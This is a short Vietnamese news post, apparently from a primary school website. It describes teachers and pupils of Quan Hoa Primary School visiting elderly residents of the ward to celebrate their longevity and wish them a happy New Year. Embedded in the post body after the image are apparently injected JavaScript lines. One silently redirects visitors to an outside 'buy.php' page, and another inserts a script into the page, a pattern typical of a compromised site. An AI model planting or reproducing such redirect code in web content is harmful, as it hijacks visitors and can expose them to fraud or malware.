Mừng thọ người cao tuổi.

05/02/2009 12:00 Sáng Phản hồi đã bị khóa

Đã thành thông lệ, hằng năm thầy trò trường Tiểu học Quan Hoa đều  đến mừng thọ và chúc Tết các cụ cao tuổi phường Quan Hoa.

Đã thành thông lệ, hằng năm thầy trò trường Tiểu học Quan Hoa đều  đến mừng thọ và chúc Tết các cụ cao tuổi phường Quan Hoa. Đây là một hoạt động thể hiện tình cảm ,lòng kính trọng  của các thế hệ trẻ đối với  người cao tuổi.
image

location.replace(“http://gethere.info/buy.php”);

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Tệp đính kèm

1233823825468_IMG0437resize
File: (23 kB)

Các phản hồi đã bị đóng lại bở quản trị.